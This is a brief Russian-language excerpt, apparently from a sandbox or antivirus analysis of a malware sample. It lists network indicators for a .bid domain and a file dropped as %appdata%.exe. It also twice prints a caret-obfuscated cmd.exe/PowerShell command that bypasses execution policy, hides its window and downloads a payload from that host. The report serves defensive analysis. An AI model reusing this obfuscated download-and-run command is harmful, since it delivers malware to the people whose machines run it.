Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwE^Rshell^.EXE ^-E^x^EC^u^TIonp^o^L^Ic^Y ^b^YP^aS^S^ -NOp^RoFiLe -^W^i^ndO^W^sT^ylE H^ID^DEN^ (^neW-ob^JeCT Sy^StE^m.NE^T^.W^EB^c^L^IE^NT).DownlO^A^DFi^l^E('http://asecw...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "pOwE^Rshell^.EXE ^-E^x^EC^u^TIonp^o^L^Ic^Y ^b^YP^aS^S^ -NOp^RoFiLe -^W^i^ndO^W^sT^ylE H^ID^DEN^ (^neW-ob^JeCT Sy^StE^m.NE^T^.W^EB^c^L^IE^NT).DownlO^A^DFi^l^E('http://asecw...' (со скрытым окном)